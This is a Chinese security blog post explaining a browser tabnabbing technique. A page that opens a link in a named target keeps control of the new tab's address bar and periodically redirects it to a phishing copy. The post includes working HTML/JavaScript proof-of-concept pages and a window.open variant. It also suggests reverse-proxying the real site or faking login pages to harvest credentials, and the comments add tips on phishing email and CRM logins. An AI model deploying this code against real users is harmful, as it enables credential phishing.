前端黑魔法之远程控制地址栏

由于今天看到一篇文章《危险的 target="_blank" 与 “opener”》,里面提到了一个老知识点,就是target="_blank"的时候,新打开的页面可以通过window.opener来控制源页面的URL,进行钓鱼攻击。这个攻击手法我在博客《神奇的opener对象》中也说过,这里就不再赘述了。这篇文章抛出另一种与target有关的钓鱼攻击。

0x01 效果演示

首先可以看一个小例子:

http://675ba661.w1n.pw/41593a

见上图,打开上述链接,然后点击“click me”,打开了百度。这时查看地址栏,的的确确是百度,然后我们等待10秒,再次查看地址栏,这个时候已经变成攻击者的网址了;即使此时我们再访问淘宝等页面,只要仍然在这个标签页下,地址栏就仍然会被控制。

0x02 原理说明

上述页面的代码也很简单:

<html>
<head><meta charset="utf-8"></head>
<body>
<a href="https://www.baidu.com" target="baidu" id="baidu" onclick="return start()">click me</a>

<script>
function start() {
    setInterval(function() {
        baidu.href="http://675ba661.w1n.pw/baidu";
        baidu.click();
    }, 10000);
}
</script>
</body>
</html>

如果用户点击了超链接“click me”,这里会启动一个循环定时器,每过10秒钟,将会将超链接的地址更换成一个仿百度的钓鱼网站,并再次点击。(当然,如果是真实攻击的话,最好是做一个真实目标的反代服务器,这个在我另一篇文章《openresty+lua在反向代理服务中的玩法》中也有详细的介绍)

这里,超链接的target属性指定目标URL在哪个页面下打开,就是目标页面的window.name。如果这个a标签的href发生了变化,再次点击链接,页面仍然会在相同的标签页下打开,所以就覆盖了上一次打开的页面。

比如,我们是一个“网址导航”类型的恶意网站,用户在我们网站上打开了百度、淘宝等标签页面,我们将可以根据用户打开的超链接来生成钓鱼页面,伪造这些网站的登录页面,精准地进行钓鱼。我这里就不进行演示了。

0x03 扩展尝试

除了超链接以外,用window.open也可以达到一样的效果:

<html>
<head><meta charset="utf-8"></head>
<body>
<a href="javascript:;" onclick="return start()">click me</a>

<script>
function start() {
    var w = window.open('https://www.baidu.com', 'baidu');
    setInterval(function() {
        w.location = 'http://675ba661.w1n.pw/baidu'
    }, 5000)
}
</script>
</body>
</html>

不过,window.open经常会被广告拦截相关的功能给阻止掉,所以可能效果不如直接用超链接。

那么,继续深入研究。这个现象究竟是否和window.name有关呢?那么是不是我们知道了某个页面的name,即可对其页面的URL进行控制?

我们可以做一个实验。编写A页面( http://a.675ba661.w1n.pw/A_victim ):

<html>
<head><meta charset="utf-8"></head>
<body>
<p>Hello world.</p>
<script>
window.name = 'baidu';
</script>
</body>
</html>

编写B页面( http://b.675ba661.w1n.pw/B_attacker ):

<html>
<head><meta charset="utf-8"></head>
<body>
<a href="https://www.baidu.com" target="baidu" id="baidu">click me</a>
</body>
</html>

A页面是目标网站,其中设置自己的name是baidu;B是攻击者的页面,其中设置target="baidu"

显然,我们在B中点击“click me”以后,会打开一个新的页面,而不是修改A页面的URL。这个实验说明,URL的远程控制和window.name没有直接关系,而是和页面的父子关系有关。

0x04 总结

本文所描述的攻击方式和opener的攻击方式比较相似,都是在不能跨域的情况下,控制目标标签页的URL,进而进行钓鱼攻击。

但我觉得这个攻击持久型更佳,因为即使用户在新标签中输入自己的域名,或者又通过超链接点击到其他网站里,这个页面的地址栏永远是受到源页面的控制的。理论上在源页面不关闭的情况下,可以永久控制新页面的地址栏。

赞赏

喜欢这篇文章?打赏1元

评论

周陆军 回复

web开发前端安全问题总结——web前端安全问题汇总,https://www.zhoulujun.cn/html/webfront/SGML/web/2015_1016_319.html
节选了此文案例,保存了原文链接,不妥之处望告知

李云龙的意大利跑 回复

局限性:如果用户已经登陆过百度且自定义了背景两次页面明显不一样

phithon 回复

@李云龙的意大利跑
兄弟,我图方便才用百度做演示。钓鱼网站钓的最多的还是邮箱、CRM之类的企业内部工具,百度账号能有多少价值。
另外,钓鱼的意义就是让用户以为自己的cookie过期导致退出了,这样他才会重新登录,我们才能钓到其账号密码。既然退出了,当然显示的是默认首页。

testsec 回复

@鲈鱼 你的小工具需要邀请码才能注册?

phithon 回复

@testsec 内部工具,不对外开放。

鲈鱼 回复

谢谢
怎么建一个域名以.pw结尾的测试网站

phithon 回复

@鲈鱼
这是我自己的一个小工具 https://phithon.gitbooks.io/conote/content/

captcha